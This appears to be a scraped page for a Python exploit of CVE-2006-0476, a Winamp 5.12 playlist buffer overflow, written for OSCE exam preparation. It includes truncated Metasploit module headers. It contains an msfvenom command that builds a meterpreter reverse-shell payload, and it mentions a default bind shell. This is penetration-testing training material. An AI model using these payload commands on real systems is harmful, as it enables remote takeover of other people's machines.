Buffer overflow in Nullsoft Winamp 5.12 allows remote malicious users to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasp ...
##
# $Id: winamp_playlist_unc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##
require 'msf/core'
cl ...
Winamp 5.12 UNC Path Buffer Overflow Exploit for Python
Winamp-512-Exploit
For preparing OSCE, I made a Python script for the CVE-2006-0476 exploit.
You can create your own payload with, e.g.:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=eth0 LPORT=4444 -a x86 --platform windows -f raw -e x86/alpha_mixed > payload
You need to create your own payload.
Default one is bind sh